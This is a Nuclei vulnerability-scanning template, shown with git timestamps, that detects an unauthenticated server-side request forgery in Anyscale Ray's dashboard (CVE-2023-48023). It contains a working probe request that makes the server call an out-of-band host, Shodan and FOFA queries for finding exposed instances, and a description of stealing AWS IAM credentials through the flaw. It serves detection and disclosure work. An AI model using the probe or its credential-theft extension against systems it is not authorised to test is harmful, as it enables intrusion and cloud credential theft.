nuclei-templates/http/cves/2023/CVE-2023-48023.yaml

51 lines
2.0 KiB
YAML
Raw Normal View History

2024-01-22 05:36:31 +00:00
id: CVE-2023-48023
info:
2024-01-22 06:01:05 +00:00
name: Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery
2024-01-22 05:36:31 +00:00
author: cookiehanhoan,harryha
severity: high
description: |
The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.
impact: |
The issue is exploitable without authentication and is dependent only on network connectivity to the Ray Dashboard port (8265 by default). The vulnerability could be exploited to retrieve the highly privileged IAM credentials required by Ray from the AWS metadata API. As an impact it is known to affect confidentiality, integrity, and availability.
remediation: Update to the latest version
reference:
- https://bishopfox.com/blog/ray-versions-2-6-3-2-8-0
- https://huntr.com/bounties/448bcada-9f6f-442e-8950-79f41efacfed/
- https://security.snyk.io/vuln/SNYK-PYTHON-RAY-6096054
2024-01-22 06:01:05 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-48023
2024-01-22 05:36:31 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2023-48023
cwe-id: CWE-441,CWE-918
metadata:
2024-01-22 06:01:05 +00:00
verified: true
max-request: 1
vendor: ray_project
shodan-query:
- http.favicon.hash:463802404
- http.html:"ray dashboard"
product: ray
fofa-query:
- icon_hash=463802404
- body="ray dashboard"
tags: cve,cve2023,ssrf,ray,anyscale,Anyscale
2024-01-22 05:36:31 +00:00
http:
- method: GET
path:
- "{{BaseURL}}/log_proxy?url=http://{{interactsh-url}}"
2024-01-22 06:01:05 +00:00
matchers-condition: and
2024-01-22 05:36:31 +00:00
matchers:
- type: word
part: interactsh_protocol
words:
2024-01-22 06:01:05 +00:00
- "dns"
- type: word
part: body
words:
- "<h1> Interactsh Server </h1>"
# digest: 4a0a0047304502207b4551473a09c16f6d6954d33b3b2bac9d42d1697fa91e804e02ee4aaf2cddf6022100e9150619a103c275d6dba6221898a72ba5d4ea31c7420d02fdc6b0d6d2d50e51:922c64590222798bb761d5b6d8e72950